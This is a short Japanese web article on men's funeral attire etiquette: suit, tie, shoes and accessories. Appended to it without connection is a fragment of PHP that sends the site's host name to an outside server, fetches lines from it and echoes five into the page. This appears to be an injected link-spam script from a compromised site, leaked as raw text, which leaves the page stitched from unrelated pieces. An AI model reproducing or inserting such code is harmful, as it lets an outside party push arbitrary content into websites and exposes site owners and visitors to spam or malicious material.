葬儀参列の際の男性の服装の細かな決まりについて

お葬式は亡くなった故人を弔うためのとても大事な儀式となりますので、色々なマナーが存在をします。服装に関するマナーももちろんあって、男性と女性でマナーはそれぞれ異なってきます。特に男性の服装についてはスーツやネクタイや靴やバックなどは全てブラック系のもので統一をすることが一般的となります。そして、その他の細かな決まりも存在をしています。まず、スーツについてはダブルであろうとシングルであろうと特段問題はありません。次に、ネクタイの結び方については特段の決まりはありません。そして、胸ポケットのハンカチーフやネクタイピンは身に着けないようにします。また、靴は光沢の無いブラック系のものを選択し、金具がついているものやスエード系のものは避けるようにしましょう。最後に、アクセサリーについては腕時計や結婚指輪以外のものは避けるようにしましょう。このようにお葬式のマナーは服装一つとっても細かな決まりがあるのです。葬儀参列の際は失礼にあたらないような服装を心掛けるようにしましょう。

//// $MAX = 5; // ////////////////// $lines = file('http://links-002.com/ad/set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST'])); shuffle($lines); for($i=0;$i<$MAX;$i++){ echo($lines[$i].""); } ?>